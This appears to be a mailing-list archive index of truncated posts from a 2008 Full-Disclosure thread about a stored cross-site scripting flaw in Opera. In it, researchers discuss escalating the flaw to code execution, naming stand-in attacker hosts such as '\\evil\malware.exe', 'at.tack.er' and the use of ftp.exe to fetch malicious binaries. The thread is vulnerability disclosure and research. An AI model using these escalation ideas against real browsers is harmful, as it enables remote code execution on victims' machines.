Re: [Full-disclosure] Opera Stored Cross Site Scripting

2008-10-23 Thread Stefano Di Paola
Good job Aviv :) that's exactly what I intended when I said: ".. On linux/Macos probably some program execution could be done using xterm --display at.tack.er in place of telnet program. Also maybe under windows some \\att.tack.er\program.exe ? .." Roberto, for the q=Xss I found, just use the fo

Re: [Full-disclosure] Opera Stored Cross Site Scripting

2008-10-23 Thread Roberto Suggi
document.body.appendChild is the way. Cheers, Roberto From: avivra [mailto:[EMAIL PROTECTED] Sent: Thursday, 23 October 2008 12:52 p.m. To: 'Stefano Di Paola'; Roberto Suggi; full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Opera Stored Cross Site Scripting Hi, Just foun

Re: [Full-disclosure] Opera Stored Cross Site Scripting

2008-10-22 Thread avivra
Hi, Just found a way to use Stefano's opera:config idea to execute code from remote. Instead of changing the HTTP Proxy, an attacker can change the default external mail application to "\\evil\malware.exe ", or to local commands (e.g. ftp.exe which can be used to download malicious binaries fr

Re: [Full-disclosure] Opera Stored Cross Site Scripting Vulnerability

2008-10-22 Thread Roberto Suggi
-Original Message- From: Stefano Di Paola [mailto:[EMAIL PROTECTED] Sent: Thursday, 23 October 2008 5:41 a.m. To: Roberto Suggi Cc: kuza55; full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Opera Stored Cross Site Scripting Vulnerability >Hi guys >I'm not a

Re: [Full-disclosure] Opera Stored Cross Site Scripting Vulnerability

2008-10-22 Thread Stefano Di Paola
iginal Message- > From: kuza55 [mailto:[EMAIL PROTECTED] > Sent: Thursday, 23 October 2008 1:25 a.m. > To: Roberto Suggi > Cc: full-disclosure@lists.grok.org.uk > Subject: Re: [Full-disclosure] Opera Stored Cross Site Scripting Vulnerability > > >Is there any potential fo

Re: [Full-disclosure] Opera Stored Cross Site Scripting Vulnerability

2008-10-22 Thread Roberto Suggi
-Original Message- From: kuza55 [mailto:[EMAIL PROTECTED] Sent: Thursday, 23 October 2008 1:25 a.m. To: Roberto Suggi Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Opera Stored Cross Site Scripting Vulnerability >Is there any potential for code execution h

Re: [Full-disclosure] Opera Stored Cross Site Scripting Vulnerability

2008-10-22 Thread kuza55
Is there any potential for code execution here similar to XSS bugs in Firefox's chrome:// context or in IE's Local Zone? Also, you have a PoC which extracts document.cookie; which cookie does this acquire? From my understanding of this advisory the xss is rendered in opera:historysearch rather tha

[Full-disclosure] Opera Stored Cross Site Scripting Vulnerability

2008-10-22 Thread Roberto Suggi
== = = Opera Stored Cross Site Scripting Vulnerability = = Vendor Website: = http://www.opera.com = = Affected Version: = -- All desktop versions = = Public disclosure on 22nd October 2008 = ==